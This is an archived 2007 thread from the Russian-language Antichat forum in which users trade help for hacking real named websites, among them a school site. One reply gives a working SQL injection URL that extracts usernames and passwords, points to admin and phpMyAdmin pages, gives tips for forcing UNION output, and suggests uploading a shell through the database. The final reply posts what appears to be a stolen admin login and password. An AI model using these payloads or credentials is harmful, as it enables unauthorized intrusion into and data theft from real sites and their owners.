ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу хелп со скулем
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

хелп со скулем
  #1  
Старый 29.08.2007, 03:14
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440

Репутация: 96
Отправить сообщение для bulbazaur с помощью ICQ
По умолчанию хелп со скулем
так, во первых, скажите мне, пожалуйста, где здесь одминка? :http://sofs.ru

во-вторых:
http://gym1517.ru/download.php?key=1+order+by+4
делаю юнион+1,2,3,4 - ошибка все равно вылезает
http://gym1517.ru/index.php?page=online&msg=18+order+by+7
делаю юнион - ни одного поля.
что делать? xD
 
Ответить с цитированием

  #2  
Старый 29.08.2007, 03:20
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
Цитата:
http://gym1517.ru/index.php?page=online&msg=18+and(1=2)+union+select +1,concat(username,0x3a,passwd),3,4,5,6,7+from+use r/*
Цитата:
http://gym1517.ru/admin/
наслаждайся

На http://sofs.ru нашел только phpMyAdmin:

Цитата:
http://sofs.ru/phpMyAdmin/
, что логично))

Ну если прав хватит на mysql.user (если у тебя там скуля) то через БД зальешь шелл

З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)
Последний раз редактировалось n0ne; 29.08.2007 в 03:26..
 
Ответить с цитированием

  #3  
Старый 29.08.2007, 12:49
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440

Репутация: 96
Отправить сообщение для bulbazaur с помощью ICQ
По умолчанию
Цитата:
Сообщение от n0ne  
наслаждайся

На http://sofs.ru нашел только phpMyAdmin:

, что логично))
я тож нашел, но юзвер и пасс не подходят туда.
Цитата:
З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)
тут фишка-то в том, что отчеты об ошибках отключены. линк, который ты мне дал - пустая страница... а вообще спасибо
 
Ответить с цитированием

  #4  
Старый 29.08.2007, 16:40
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
Ты бы пробелы убрал, хекер)

Цитата:
admin507:gym1517admin
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть ли уязвимости на этом форуме? kju О Работе 4 25.07.2006 18:22
АЙ НИД ХЕЛП SDA Чаты 0 13.01.2005 14:05
Хелп Lucieferius Чаты 2 30.12.2004 18:24
НАРОД пожалуйсто ХЕЛП... d0Ck Болталка 8 25.12.2004 15:00
ХЕЛП arhangel Чаты 6 29.11.2004 00:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ